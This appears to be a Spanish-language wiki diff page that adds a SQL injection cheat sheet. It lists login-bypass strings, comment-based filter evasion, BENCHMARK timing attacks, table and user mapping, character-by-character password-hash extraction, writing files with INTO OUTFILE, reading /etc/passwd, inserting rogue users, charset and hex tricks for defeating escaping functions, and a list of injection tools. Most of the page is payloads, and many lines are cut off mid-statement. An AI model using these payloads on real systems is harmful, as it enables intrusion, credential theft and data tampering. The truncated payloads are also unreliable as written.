meta data de esta página
Diferencias
Muestra las diferencias entre dos versiones de la página.
| Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
| seguridad:sql_injection [012013/03/ 13:03] – lc | seguridad:sql_injection [182023/01/ 13:11] (actual) – editor externo 127.0.0.1 | ||
|---|---|---|---|
| Línea 1: | Línea 1: | ||
| + | ==== SQL Injection ==== | ||
| + | === Técnicas === | ||
| + | < | ||
| + | * /**/ | ||
| + | * /*--*/ | ||
| + | * + | ||
| + | * %09 | ||
| + | * %0A | ||
| + | * %0D | ||
| + | </ | ||
| + | === Técnicas extraidas de 0x000000.com | ||
| + | <code sql> | ||
| + | 1 SELECT * FROM login /* foobar */ | ||
| + | 2 SELECT * FROM login WHERE id = 1 or 1=1 | ||
| + | 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | ||
| + | </ | ||
| + | Use inside login form: | ||
| + | < | ||
| + | 01 1' OR 1=1-- | ||
| + | 02 1' OR ' | ||
| + | 03 ' | ||
| + | 04 '' | ||
| + | 05 ' | ||
| + | 06 ') or (' | ||
| + | 07 ") or (" | ||
| + | 08 hi" or " | ||
| + | 09 or a=a-- | ||
| + | 10 admin' | ||
| + | 11 ' or 0=0 -- | ||
| + | 12 " or 0=0 -- | ||
| + | 13 or 0=0 -- | ||
| + | 14 ' or ' | ||
| + | 15 " or " | ||
| + | 16 ') or (' | ||
| + | 17 ' or 1=1-- | ||
| + | 18 " or 1=1-- | ||
| + | 19 or 1=1-- | ||
| + | 20 ' or a=a-- | ||
| + | 21 " or " | ||
| + | </ | ||
| + | Variations: | ||
| + | <code sql> | ||
| + | 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | ||
| + | 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | ||
| + | 03 | ||
| + | 04 SHOW TABLES | ||
| + | 05 SELECT * FROM login WHERE id = 1 or 1=1 AND SHOW TABLES | ||
| + | 06 | ||
| + | 07 SELECT VERSION | ||
| + | 08 SELECT * FROM login WHERE id = 1 or 1=1 AND SELECT VERSION() | ||
| + | 09 | ||
| + | 10 SELECT host, | ||
| + | 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | ||
| + | </ | ||
| + | Blind injection vectors collection | ||
| + | <code sql> | ||
| + | Operators | ||
| + | |||
| + | 1 SELECT 1 && 1; | ||
| + | 2 SELECT 1 || 1; | ||
| + | 3 SELECT 1 XOR 0; | ||
| + | </ | ||
| + | <code sql> | ||
| + | Evaluate | ||
| + | 1 all render TRUE or 1. | ||
| + | 2 SELECT 0.1 <= 2; | ||
| + | 3 SELECT 2 >= 2; | ||
| + | 4 SELECT ISNULL(1/ | ||
| + | </ | ||
| + | <code sql> | ||
| + | Math | ||
| + | 1 SELECT FLOOR(7 + (RAND() * 5)); | ||
| + | 2 SELECT ROUND(23.298, | ||
| + | </ | ||
| + | <code sql> | ||
| + | Misc | ||
| + | 1 SELECT LENGTH(COMPRESS(REPEAT(' | ||
| + | 2 SELECT MD5(' | ||
| + | </ | ||
| + | <code sql> | ||
| + | Benchmark | ||
| + | 01 SELECT BENCHMARK(10000000, | ||
| + | 02 (this takes around 5 sec on a localhost) | ||
| + | 03 | ||
| + | 04 SELECT BENCHMARK(1000000, | ||
| + | 05 (this takes around 7 sec on a localhost) | ||
| + | 06 | ||
| + | 07 SELECT BENCHMARK(10000000, | ||
| + | 08 (this takes around 70 sec on a localhost!) | ||
| + | 09 | ||
| + | 10 Using the timeout to check if user exists | ||
| + | 11 SELECT IF( user = ' | ||
| + | </ | ||
| + | Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | ||
| + | Gathering info | ||
| + | <code sql> | ||
| + | Table mapping | ||
| + | 1 SELECT COUNT(*) FROM tablename | ||
| + | </ | ||
| + | <code sql> | ||
| + | Field mapping | ||
| + | 1 SELECT * FROM tablename WHERE user LIKE " | ||
| + | 2 SELECT * FROM tablename WHERE user LIKE " | ||
| + | 3 SELECT * FROM tablename WHERE user = ' | ||
| + | 4 SELECT * FROM tablename WHERE user = ' | ||
| + | </ | ||
| + | <code sql> | ||
| + | User mapping | ||
| + | 1 SELECT * FROM tablename WHERE email = ' | ||
| + | 2 SELECT * FROM tablename WHERE user LIKE " | ||
| + | 3 SELECT * FROM tablename WHERE user = ' | ||
| + | </ | ||
| + | <code sql> | ||
| + | Advanced SQL vectors | ||
| + | Writing info into files. | ||
| + | 1 SELECT password FROM tablename WHERE username = ' | ||
| + | </ | ||
| + | <code sql> | ||
| + | Writing info into files without single quotes: (example) | ||
| + | 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | ||
| + | 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | ||
| + | 3 CHAR( 39)) | ||
| + | Note: You must specify a new file, it may not exists and give the correct pathname. | ||
| + | </ | ||
| + | <code sql> | ||
| + | The CHAR() quoteless function. | ||
| + | 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | ||
| + | 2 CHAR(110), | ||
| + | 3 | ||
| + | 4 SELECT * FROM login WHERE user = CHAR(39, | ||
| + | </ | ||
| + | <code sql> | ||
| + | Extracting hashes | ||
| + | 1 SELECT user FROM login WHERE user = ' | ||
| + | 2 UNION SELECT IF(SUBSTRING(pass, | ||
| + | </ | ||
| + | This evaluates the first char of the password hash from user ' | ||
| + | |||
| + | The hash is max 32 chars, and for every chars you'll need to execute the query with CHAR() | ||
| + | |||
| + | The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | ||
| + | <code sql> | ||
| + | 01 SELECT user FROM login WHERE user = ' | ||
| + | 02 UNION SELECT IF(SUBSTRING(pass, | ||
| + | 03 | ||
| + | 04 1SELECT user FROM login WHERE user = ' | ||
| + | 05 UNION SELECT IF(SUBSTRING(pass, | ||
| + | 06 | ||
| + | 07 where: (passwordfield, | ||
| + | 08 | ||
| + | 09 is like: (password, | ||
| + | 10 is like: (password, | ||
| + | 11 is like: (password, | ||
| + | </ | ||
| + | A quoteless example: | ||
| + | <code sql> | ||
| + | 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | ||
| + | 2 UNION SELECT IF(SUBSTRING(pass, | ||
| + | </ | ||
| + | Possible chars | ||
| + | 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | ||
| + | Misc. | ||
| + | Insert a new user into DB | ||
| + | <code sql> | ||
| + | 1 INSERT INTO login SET user = ' | ||
| + | </ | ||
| + | Retrieve /etc/passwd file, put it into a field and insert a new user. | ||
| + | < | ||
| + | |||
| + | Then login! | ||
| + | |||
| + | Write the DB user away into tmp | ||
| + | <code sql> | ||
| + | |||
| + | Change admin e-mail, for " | ||
| + | < | ||
| + | |||
| + | Bypassing PHP functions | ||
| + | Bypassing addslashes() with GBK HEX encoding. | ||
| + | < | ||
| + | |||
| + | Using an HEX encoded query to bypass escaping. | ||
| + | <code sql> | ||
| + | 1 Normal: SELECT * FROM login WHERE user = ' | ||
| + | 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | ||
| + | </ | ||
| + | Inserting a new user in SQL. | ||
| + | < | ||
| + | 1 Normal: insert into login set user = ' | ||
| + | 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | ||
| + | </ | ||
| + | How to determin the HEX value for injection. | ||
| + | <code sql> | ||
| + | |||
| + | With comments. | ||
| + | < | ||
| + | 1 S/ | ||
| + | 2 W/ | ||
| + | </ | ||
| + | Bypassing mysql_real_escape_string() with BIG5 or GBK | ||
| + | < | ||
| + | |||
| + | (MySQL 4.1.x before 4.1.20 and 5.0.x) | ||
| + | |||
| + | |||
| + | ==== Herramientas ==== | ||
| + | * Havij -> http:// | ||
| + | * Havij http:// | ||
| + | * PonyMagic http:// | ||
| + | * General Injection Explorer | ||
| + | * Safe 3 sql injector http:// | ||
| + | * Enema http:// | ||
| + | * Absinthe http:// | ||
| + | * Pangolin http:// | ||
| + | * sql poison | ||
| + | * sql map gui | ||
| + | * bsql hacker http:// | ||
| + | * | ||
| + | |||
| + | |||
| + | |||
| + | ==== Referencias ==== | ||
| + | * http:// | ||
| + | * http:// | ||